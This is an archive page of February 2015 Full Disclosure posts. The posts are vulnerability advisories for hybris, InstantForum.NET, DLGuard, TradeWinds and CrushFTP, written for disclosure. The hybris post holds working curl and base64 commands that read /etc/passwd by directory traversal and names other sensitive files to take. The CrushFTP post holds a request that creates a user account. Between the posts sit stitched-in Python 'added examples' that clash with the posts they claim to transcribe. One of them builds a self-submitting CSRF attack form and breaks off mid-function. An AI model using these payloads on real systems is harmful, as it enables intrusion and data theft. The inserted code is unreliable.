[FD] [RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite

2015-02-18 Thread RedTeam Pentesting GmbH
Advisory: Directory Traversal and Arbitrary File Disclosure in hybris
  Commerce Software Suite

During a penetration test, RedTeam Pentesting discovered a Directory
Traversal vulnerability in hybris Commerce software suite. This
vulnerability allows attackers to download arbitrary files of any size
from the affected system.


Details
=======

Product: hybris Commerce Software Suite
Affected Versions:
  Release 5.3:   <= 5.3.0.1
  Release 5.2:   <= 5.2.0.3
  Release 5.1.1: <= 5.1.1.2
  Release 5.1:   <= 5.1.0.1
  Release 5.0.4: <= 5.0.4.4
  Release 5.0.3: <= 5.0.3.3
  Release 5.0.0: <= 5.0.0.3
Fixed Versions:
  Release 5.3:   5.3.0.2
  Release 5.2:   5.2.0.4
  Release 5.1.1: 5.1.1.3
  Release 5.1:   5.1.0.2
  Release 5.0.4: 5.0.4.5
  Release 5.0.3: 5.0.3.4
  Release 5.0.0: 5.0.0.4
Vulnerability Type: Directory Traversal, Arbitrary File Disclosure
Security Risk: high
Vendor URL: http://www.hybris.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016
Advisory Status: published
CVE: CVE-2014-8871
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871


Introduction
============

hybris delivers a commerce software suite that is best in class,
helping a company execute all its direct selling processes and present a
single view and a unified experience to all its customers.

(from the vendor's homepage)


More Details
============


Webshops based on hybris may use an image retrieval system where images
are identified by a URL parameter named context rather than a file
name. When this system is used, images can be referenced e.g. like the
following:

<img src="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl
Z3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3
YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200" />

Changing the file name part of the URL from image.jpg to e.g.
redteam.jpg reveals that not the file name part of the URL, but the
value of the parameter context is used to select the desired file.

A closer look at the parameter shows that its value is encoded as
Base64. Decoding it reveals a pipe-separated data structure which
includes a file size (third value), a file name (fifth value) and a
SHA-256 hash (sixth value):

$ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\
Z3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\
1OTkxYjc4NTJiODU1" | base64 -d

master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89
96fb92427ae41e4649b934ca495991b7852b855

During the penetration test many parameters were inspected and it turned
out that the SHA-256 hash is used to reference a particular version of
the file, and can be replaced by a dash (-) character, which always
returns the latest version. The example request can be modified and
requested with curl as follows:

$ echo -n "master|root|12345|image/jpeg|7415687361172.jpg|-" | base64
bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt
$ curl -I "http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\
8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt"

It was verified that the file name (fifth) value is vulnerable to
directory traversal. This enables attackers to retrieve the contents of
other files from the server's filesystem by using sequences of ../.
The following HTTP request for example delivers the contents of the file
/etc/passwd:

$ echo -n "master|root|12345|text/plain|../../../../../../etc/passwd|-" \
  | base64 -w0
bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz
c3dkfC0=

$ curl "http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\
IzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]

The size included in the third field of the data structure is used to
limit the number of bytes returned for a file. As it can be modified by
attackers, files of any size with arbitrary content can be downloaded,
provided the path to the file on the server is known. This enables
attackers to read, among others, the environment of the current process
at /proc/self/environ and the list of memory maps including the full
paths to loaded libraries at /proc/self/maps. This way, knowledge about
a particular instance of hybris can be gathered. Afterwards it is
possible to access configuration files like local.properties and the
log files for shop orders which also contain the current session-IDs of
users. Furthermore, the Java bytecode of hybris can be downloaded and
decompiled.


Proof of Concept
================



FILENAME="/etc/passwd"
curl "https://www.example.com/medias/redteam?context=$(base64 -w0 <<< \
"master|root|2|text/plain|../../../../../..${FILENAME}|-")"
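Added example, not code from the advisory or from hybris: a small Python tool that builds and decodes tokens with the six-field record layout described above and runs a traversal check over web-server access-log lines, which is what a shop operator would want after reading this advisory. The field names "tenant" and "folder" for the first two values ("master" and "root") are an assumption, and the log lines in SAMPLE_LOG are constructed for this example.

```python
"""Decode and audit hybris-style "context" media tokens (added example)."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit


@dataclass
class MediaContext:
    # Record layout from the advisory: six pipe-separated fields. The
    # names "tenant" and "folder" for the first two are assumptions.
    tenant: str
    folder: str
    size: int          # caps the number of bytes the server returns
    mime: str
    filename: str      # the field vulnerable to ../ traversal
    version: str       # SHA-256 hex of one version, or "-" for the latest


def encode_context(ctx: MediaContext) -> str:
    raw = "|".join([ctx.tenant, ctx.folder, str(ctx.size),
                    ctx.mime, ctx.filename, ctx.version])
    return base64.b64encode(raw.encode()).decode()


def decode_context(token: str) -> MediaContext:
    token = token.strip()
    token += "=" * (-len(token) % 4)      # URLs usually drop the padding
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError) as exc:
        raise ValueError(f"not a context token: {exc}") from exc
    parts = raw.split("|")
    if len(parts) != 6 or not parts[2].isdigit():
        raise ValueError(f"unexpected record layout: {raw!r}")
    return MediaContext(parts[0], parts[1], int(parts[2]),
                        parts[3], parts[4], parts[5])


def escapes_media_root(filename: str) -> bool:
    """True if the filename field can resolve outside the media directory.

    Tracks depth segment by segment, so "../x", "a/../../x" and "..\\x"
    are caught while "a/../b" (still inside) is not; absolute paths are
    always rejected.
    """
    candidate = filename.replace("\\", "/")
    if candidate.startswith("/"):
        return True
    depth = 0
    for segment in candidate.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def audit_request(target: str) -> Dict[str, object]:
    """Classify one request target; only /medias/ URLs with a context matter."""
    parsed = urlsplit(target)
    token = parse_qs(parsed.query).get("context", [None])[0]
    if not parsed.path.startswith("/medias/") or token is None:
        return {"relevant": False}
    try:
        ctx = decode_context(token)
    except ValueError as exc:
        return {"relevant": True, "verdict": "malformed", "detail": str(exc)}
    verdict = "traversal" if escapes_media_root(ctx.filename) else "ok"
    return {"relevant": True, "verdict": verdict, "filename": ctx.filename,
            "latest_version": ctx.version == "-", "size": ctx.size}


REQUEST_RE = re.compile(r'"(?:GET|HEAD) (\S+) HTTP/[\d.]+"')


def audit_log(lines: List[str]) -> List[Tuple[str, str]]:
    """(request target, decoded filename) for every traversal attempt seen."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            result = audit_request(match.group(1))
            if result.get("verdict") == "traversal":
                findings.append((match.group(1), str(result["filename"])))
    return findings


# Constructed access-log lines: a normal image fetch, the advisory's
# /etc/passwd token without padding (as in its curl line), and a
# context value that is not Base64 at all.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Feb/2015:10:01:02 +0100] "GET /medias/image.jpg?context='
    'bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt HTTP/1.1" 200 12345',
    '203.0.113.5 - - [18/Feb/2015:10:01:09 +0100] "GET /medias/redteam?context='
    'bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0 HTTP/1.1" 200 1731',
    '203.0.113.5 - - [18/Feb/2015:10:01:15 +0100] "GET /medias/x.jpg?context=not%20base64 HTTP/1.1" 400 0',
]

if __name__ == "__main__":
    for target, name in audit_log(SAMPLE_LOG):
        print(f"traversal attempt: {target} -> {name}")
```

The check works on the decoded filename field rather than on the raw URL, because the traversal sequence never appears in the request line: it is hidden inside the Base64 token, so a WAF rule looking for "../" in URLs would not see it. Backslashes are folded into slashes before walking the path so that Windows-style sequences are caught too.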




[FD] CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities*



Exploit Title: InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities
Product: InstantForum.NET
Vendor: InstantASP
Vulnerable Versions: v4.1.3   v4.1.1   v4.1.2   v4.0.0   v4.1.0   v3.4.0
Tested Version: v4.1.3   v4.1.1   v4.1.2
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9468
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
InstantASP


*Product & Version:*
InstantForum.NET
v4.1.3 v4.1.1 v4.1.2 v4.0.0 v4.1.0 v3.4.0


*Vendor URL & Download:*
InstantForum.NET can be downloaded from here,
http://docs.instantasp.co.uk/InstantForum/default.html?page=v413tov414guide.html


*Product Introduction:*
“InstantForum.NET is a feature rich, ultra high performance ASP.NET & SQL
Server discussion forum solution designed to meet the needs of the most
demanding online communities or internal collaboration environments. Now in
the fourth generation, InstantForum.NET has been completely rewritten from
the ground-up over several months to introduce some truly unique features &
performance enhancements.

The new administrator control panel now offers the most comprehensive
control panel available for any ASP.NET based forum today. Advanced
security features such as role based permissions and our unique Permission
Sets feature provides unparalleled configurable control over the content
and features that are available to your users within the forum. Moderators
can easily be assigned to specific forums with dedicated moderator
privileges for each forum. Bulk moderation options ensure even the busiest
forums can be managed effectively by your moderators.

The forums template driven skinning architecture offers complete
customization support. Each skin can be customized to support a completely
unique layout or visual appearance. A single central style sheet controls
every aspect of a skins appearance. The use of unique HTML wrappers and
ASP.NET 1.1 master pages ensures page designers can easily integrate an
existing design around the forum. Skins, wrappers & master page templates
can be applied globally to all forums or to any specific forum.”





*(2) Vulnerability Details:*
InstantForum.NET has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs on the “Join.aspx” page, in its
SessionID parameter.

*(2.2)* The second vulnerability occurs on the “Logon.aspx” page, in its
SessionID parameter.









*References:*
http://tetraph.com/security/cves/cve-2014-9468-instantasp-instantforum-net-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9468-instantasp.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9468
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9468
https://security-tracker.debian.org/tracker/CVE-2014-9468
http://www.cvedetails.com/cve/CVE-2014-9468/
http://www.security-database.com/detail.php?alert=CVE-2014-9468
http://packetstormsecurity.com/files/cve/CVE-2014-9468
http://www.pentest.it/cve-2014-9468.html
http://www.naked-security.com/cve/CVE-2014-9468/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9468/
http://007software.net/cve-2014-9468/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9468/
https://vulnerabilitypost.wordpress.com/2015/02/18/cve-2014-9468/








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities*



Exploit Title: DLGuard Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities

Product: DLGuard

Vendor: DLGuard

Vulnerable Versions: v5   v4.6   v4.5

Tested Version: v5   v4.6

Advisory Publication: Feb 18, 2015

Latest Update: Feb 18, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*




*(1) Vendor & Product Description:*



*Vendor:*
DLGuard



*Product & Version:*
DLGuard
v5   v4.6   v4.5



*Vendor URL & Download:*
DLGuard can be downloaded from here,

http://www.dlguard.com/dlginfo/index.php



*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for.

DLGuard supports the three types, or methods, of sale on the internet:

1. Single item sales (including bonus products!)

2. Multiple item sales

3. Membership websites”





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs on the “index.php” page, in its
page, c and redirect parameters.

*(2.2)* The second vulnerability occurs in the main page's search field,
through the searchTerm parameter sent in an HTTP POST.








*References:*
http://tetraph.com/security/xss-vulnerability/dlguard-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-multiple-xss-cross-site.html










[FD] DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*DLGuard Full Path Disclosure (Information Leakage) Security
Vulnerabilities*



Exploit Title: DLGuard /index.php c parameter Full Path Disclosure Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
DLGuard


*Product & Version:*
DLGuard
v4.5


*Vendor URL & Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for.


DLGuard supports the three types, or methods, of sale on the internet:
1. Single item sales (including bonus products!)
2. Multiple item sales
3. Membership websites”





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by Full Path Disclosure
attacks.


*(2.1)* The first vulnerability occurs on the “index.php” page, in its c
parameter.






*References:*
http://tetraph.com/security/full-path-disclosure-vulnerability/dlguard-full-path-disclosure-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-full-path-disclosure.html









[FD] Bug in TradeWinds

2015-02-18 Thread Juan Martinez
Hi, I am writing to you because I want to make public a bug in a web server
called Trade Winds, through which a lot of compromising information about
internal servers is exposed. Through a Google dork, inurl:cgi-shl/twserver.exe run?,
the vulnerable servers can be found. Requesting this URL:
http://victim/cgi-shl/twserver.exe run (example: CityInfo?) brings back an
error with this data:

TradeWinds: Environment variables sent by Microsoft-IIS/6.0
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APP_POOL_ID=DefaultAppPool
ClusterLog=C:\WINDOWS\Cluster\cluster.log
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=WEBSERVER
ComSpec=C:\WINDOWS\system32\cmd.exe
DSETPATH=C:\Program Files\Dell\DSET
FP_NO_HOST_CHECK=NO
lib=C:\Program Files\SQLXML 4.0\bin\
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\PHP\;C:\Perl\site\bin;C:\Perl\bin;C:\Program Files\Support Tools\;C:\PVSW\BIN;C:\CFusionMX7\verity\k2\_nti40\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\Dell\SysMgt\RAC5;C:\Program Files\Dell\SysMgt\oma\bin;C:\Program Files\Microsoft SQL Server\80\Tools\Binn\;C:\Program Files\Microsoft SQL Server\90\Tools\Binn\;C:\Program Files\Microsoft SQL Server\90\DTS\Binn\;C:\Program Files\Microsoft SQL Server\90\Tools\Binn\VSShell\Common7\IDE\;C:\Program Files\Microsoft Visual Studio 8\Common7\IDE\PrivateAssemblies\;D:\MySQL\MySQL 1.3.6 Utilities\
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.wsf;.WSH
PHPRC=C:\PHP\
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 62 Stepping 4 GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=3e04
ProgramFiles=C:\Program Files
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\WINDOWS\TEMP
TMP=C:\WINDOWS\TEMP
USERPROFILE=C:\Documents and Settings\Default User
VERITY_CFG=C:\CFusionMX7\verity\k2\common\verity.cfg
VSL=C:\PVSW\BIN
windir=C:\WINDOWS

That data and more about the server, and about the PC making the connection.
So I decided to report it to you and make the finding public. Greetings, and
I hope I have not bothered you or taken up your time.

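Added example, not part of the post above: the error page returns the server's environment as one run-on line, and the text of the post also has spaces around every backslash. This Python parser recovers the individual variables, normalises the Windows paths and summarises what the leak hands an attacker before any further contact with the host. RAW_DUMP is transcribed from the post; the variable names and products it reports come from that text, and nothing else about TradeWinds is assumed.

```python
"""Recover variables from the TradeWinds environment dump (added example)."""
import re
from typing import Dict, List

# Transcribed from the post: one run-on line, spaces around every backslash.
RAW_DUMP = (
    "TradeWinds: Environment variables sent by Microsoft-IIS / 6.0 "
    "ALLUSERSPROFILE = C: \\ Documents and Settings \\ All Users "
    "APP_POOL_ID = DefaultAppPool ClusterLog = C: \\ WINDOWS \\ Cluster \\ cluster.log "
    "CommonProgramFiles = C: \\ Program Files \\ Common Files COMPUTERNAME = WEBSERVER "
    "ComSpec = C: \\ WINDOWS \\ system32 \\ cmd.exe DSETPATH = C: \\ Program Files \\ Dell \\ DSET "
    "FP_NO_HOST_CHECK = NO lib = C: \\ Program Files \\ SQLXML 4.0 \\ bin \\ "
    "NUMBER_OF_PROCESSORS = 2 OS = Windows_NT "
    "Path = C: \\ PHP \\; C: \\ Perl \\ site \\ bin; C: \\ Perl \\ bin; "
    "C: \\ Program Files \\ Support Tools \\; C: \\ PVSW \\ BIN; "
    "C: \\ CFusionMX7 \\ verity \\ k2 \\ _nti40 \\ bin; C: \\ WINDOWS \\ system32; C: \\ WINDOWS; "
    "C: \\ WINDOWS \\ System32 \\ Wbem; C: \\ Program Files \\ Dell \\ SysMgt \\ RAC5; "
    "C: \\ Program Files \\ Dell \\ SysMgt \\ oma \\ bin; "
    "C: \\ Program Files \\ Microsoft SQL Server \\ 80 \\ Tools \\ Binn \\; "
    "C: \\ Program Files \\ Microsoft SQL Server \\ 90 \\ Tools \\ Binn \\; "
    "C: \\ Program Files \\ Microsoft SQL Server \\ 90 \\ DTS \\ Binn \\; "
    "C: \\ Program Files \\ Microsoft SQL Server \\ 90 \\ Tools \\ Binn \\ VSShell \\ Common7 \\ IDE \\; "
    "C: \\ Program Files \\ Microsoft Visual Studio 8 \\ Common7 \\ IDE \\ PrivateAssemblies \\; "
    "D: \\ MySQL \\ MySQL 1.3.6 Utilities \\ "
    "PATHEXT = .COM; .EXE; .BAT; .CMD; .VBS; .VBE; .JS; .JSE; .wsf; .WSH "
    "PHPRC = C: \\ PHP \\ PROCESSOR_ARCHITECTURE = x86 "
    "PROCESSOR_IDENTIFIER = x86 Family 6 Model 62 Stepping 4 GenuineIntel "
    "PROCESSOR_LEVEL = 6 PROCESSOR_REVISION = 3e04 ProgramFiles = C: \\ Program Files "
    "SystemDrive = C: SystemRoot = C: \\ WINDOWS TEMP = C: \\ WINDOWS \\ TEMP "
    "TMP = C: \\ WINDOWS \\ TEMP USERPROFILE = C: \\ Documents and Settings \\ Default User "
    "VERITY_CFG = C: \\ CFusionMX7 \\ verity \\ k2 \\ common \\ verity.cfg "
    "VSL = C: \\ PVSW \\ BIN windir = C: \\ WINDOWS"
)

# A variable name is a word at the start or after whitespace, followed by " = ".
KEY_RE = re.compile(r"(?:^|(?<=\s))([A-Za-z_]\w*) = ")


def normalise(value: str) -> str:
    """Undo the spacing: "C: \\ Program Files \\ Dell" -> "C:\\Program Files\\Dell"."""
    value = re.sub(r"\s*\\\s*", "\\\\", value)
    value = re.sub(r";\s+", ";", value)
    return value.strip()


def parse_env_dump(text: str) -> Dict[str, str]:
    """Split the dump at every "NAME = " and keep the text up to the next one."""
    hits = list(KEY_RE.finditer(text))
    env = {}
    for i, hit in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(text)
        env[hit.group(1)] = normalise(text[hit.end():end])
    return env


def path_entries(env: Dict[str, str]) -> List[str]:
    return [e for e in env.get("Path", "").split(";") if e]


def software_roots(env: Dict[str, str]) -> List[str]:
    """Product directories on PATH: the first directory, or "Program Files\\X"."""
    roots = set()
    for entry in path_entries(env):
        parts = entry.split("\\")
        if len(parts) < 2:
            continue
        root = parts[1]
        if root.lower() == "program files" and len(parts) > 2:
            root = parts[1] + "\\" + parts[2]
        roots.add(root)
    return sorted(roots)


def attacker_summary(env: Dict[str, str]) -> Dict[str, object]:
    """What the leak reveals: host name, platform, app pool, and installed products."""
    return {
        "host": env.get("COMPUTERNAME"),
        "platform": f"{env.get('OS')} {env.get('PROCESSOR_ARCHITECTURE')}, "
                    f"{env.get('NUMBER_OF_PROCESSORS')} CPU(s)",
        "iis_app_pool": env.get("APP_POOL_ID"),
        "scratch_dirs": sorted({env[k] for k in ("TEMP", "TMP") if k in env}),
        "software": software_roots(env),
    }


if __name__ == "__main__":
    summary = attacker_summary(parse_env_dump(RAW_DUMP))
    for key, value in summary.items():
        print(f"{key}: {value}")
```

The split is driven by the "NAME = " pattern rather than by whitespace because values such as Path and PROCESSOR_IDENTIFIER contain spaces themselves; anything between one variable name and the next is that variable's value. The software list is derived only from PATH, which is why it shows the ColdFusion, SQL Server, Perl, PHP, Dell OpenManage and Pervasive directories without any guessing about versions beyond what the directory names carry.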


[FD] DLGuard SQL Injection Security Vulnerabilities

2015-02-18 Thread Jing Wang
DLGuard SQL Injection Security Vulnerabilities


Exploit Title: DLGuard /index.php c parameter SQL Injection Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
DLGuard


*Product & Version:*
DLGuard
v4.5


*Vendor URL & Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for.

DLGuard supports the three types, or methods, of sale on the internet:
1. Single item sales (including bonus products!)
2. Multiple item sales
3. Membership websites”





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by SQL Injection
attacks.


*(2.1)* The first vulnerability occurs on the “index.php” page, in its c
parameter.







*References:*
http://tetraph.com/security/sql-injection-vulnerability/dlguard-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-sql-injection-security.html







[FD] Crushftp 7.2.0 - Multiple CSRF XSS Vulnerabilities

2015-02-18 Thread Rehan Ahmed

 I. Overview
 
Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been
identified in CrushFTP 7.2.0 (Web Interface) in the default configuration.
These vulnerabilities allow an attacker to gain control over valid user
accounts, perform operations on their behalf, redirect them to malicious
sites, steal their credentials, and more.
 
 II. Severity
 
 Rating: Medium
 Remote: Yes
 Authentication Required: Yes
 
 III. Vendor's Description of Application
 
CrushFTP is a robust file transfer server that makes it easy to setup secure 
connections with your users.
'Crush' comes from the built-in zip methods in CrushFTP. They allow for 
downloading files in compressed formats in-stream, 
or even automatically expanding zip files as they are received in-stream. This 
is called ZipStreaming and can greatly accelerate 
the transfer of many types of files.
Secure management is web based allowing you the ability to manage and monitor 
the server from anywhere, or with almost any device. 
Easy in place server upgrades without complicated installers. Runs as a daemon, 
or Windows service with no need for a local GUI.
CrushFTP is watching out for you by detecting common hack attempts and robots 
which scan for weak passwords. It will automatically 
protect you against DDoS attacks. No need for you to do anything as CrushFTP 
will automatically ban these IPs to prevent wasted logging and CPU usage. 
This keeps your server secure from unwanted abuse.
User management includes inheritance, groups, and virtual file systems. If you 
want simple user management, 
it can be as easy as just making a folder with a specific name and nothing 
else. 
Think about how easily you can delegate user administration with CrushFTP's 
role based administration and event configuration. 
http://www.crushftp.com/index.html

 
 IV. Vulnerability Details & Exploit
 

 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) 

 a) An attacker may add/delete/modify user's accounts 
 b) May change all configuration settings 

Request Method: POST
Location: /WebInterface/function/

Proof of Concept:- 

2) Multiple Cross-Site Scripting (Web Interface - Default Config)

Type: Reflected
Request Method: POST 
Location: /WebInterface/function/ 
Parameter: vfs_items
Values:  
vfs_items =  


Proof of Concept:

POST /WebInterface/function/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html
Content-Length: 656
Cookie: X
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E


Type: Reflected
Request Method: GET 
Location: /WebInterface/function/ 
Parameter: path
Values:   

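Added example, not part of the advisory or of CrushFTP: the captured setUserItem request above, with the & separators restored between its form fields, decoded to show what it does, then rendered as the cross-site auto-submitting form the CSRF finding implies, and finally put through the server-side checks that would refuse such a request. The site origin (taken from the Host and Referer of the capture), the attacker origin and the csrf_token field name are assumptions made for this example; the point is that the 7.2.0 request carries no such token and is an ordinary form-encoded POST.

```python
"""Analyse the captured CrushFTP "setUserItem" request for CSRF (added example)."""
import hmac
import html
from typing import Dict, Optional
from urllib.parse import parse_qs, urlsplit
import xml.etree.ElementTree as ET

SITE_ORIGIN = "http://127.0.0.1:8080"           # from Host/Referer in the capture
TARGET = SITE_ORIGIN + "/WebInterface/function/"

# Body of the request in the advisory, with "&" between the fields.
CAPTURED_BODY = (
    "command=setUserItem&data_action=new&serverGroup=MainUsers&username=test"
    "&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E"
    "%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E"
    "%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E"
    "%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user"
    "&vfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E"
    "%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E"
    "&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E"
    "%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E"
    "(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E"
)


def fields(body: str) -> Dict[str, str]:
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def summarize(body: str) -> Dict[str, object]:
    """What the request does: the account it creates and its permissions."""
    f = fields(body)
    user = ET.fromstring(f["user"])
    perms = ET.fromstring(f["permissions"])
    return {
        "command": f["command"],
        "action": f["data_action"],
        "new_username": user.findtext("username"),
        "root_dir": user.findtext("root_dir"),
        "permissions": {item.get("name"): item.text for item in perms.findall("item")},
    }


def csrf_form(target: str, body: str) -> str:
    """Render the body as a self-submitting HTML form.

    A page on another origin can make the victim's browser send exactly
    this request, cookies included, because it is a plain
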